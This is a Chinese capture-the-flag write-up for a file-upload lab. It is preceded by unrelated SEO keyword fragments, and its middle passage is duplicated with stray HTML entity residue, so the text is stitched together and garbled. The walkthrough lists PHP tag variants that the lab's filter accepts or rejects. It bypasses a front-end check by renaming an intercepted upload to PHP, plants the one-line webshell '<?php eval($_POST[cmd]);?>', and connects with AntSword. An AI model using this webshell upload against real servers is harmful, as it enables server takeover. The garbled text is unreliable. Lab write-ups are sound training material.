建设部网站1667号,电脑游戏排行榜2020前十名,新闻发布会活动方案,做网站背景图片拿到这道题目一看#xff0c;发现是upload靶场#xff1b;这不简简单单吗#xff1b;结果中间还是遇到了一些小问题
小坑总结#xff1a;该关只识别标准php语法#xff1a;?php phpinfo()?格式#xff1b;即?php ?
不识别? phpinfo()? 发现是upload靶场这不简简单单吗结果中间还是遇到了一些小问题
小坑总结该关只识别标准php语法?php phpinfo()?格式即?php ?
不识别? phpinfo()? % phpinfo();% script languagephpphpinfo();/script等格式;
这是很操蛋的一点儿差点儿以为是??格式过滤呢绕了半天也没绕过最后放弃了直接使用?php ?竟然过了真的裂开 开始操作
直接选择第一关或者第二关前几关都很简单
upload靶场通关笔记在此Upload靶场通关教程旧版20关-CSDN博客
第一关是前端验证的直接上传一张图片抓包进行修改 文件名改为php的内容改为一句话木马?php eval($_POST[cmd]);?;
点击上传成功上传复制图片地址进行蚁剑连接 蚁剑连接成功在根目录下找到flag 10
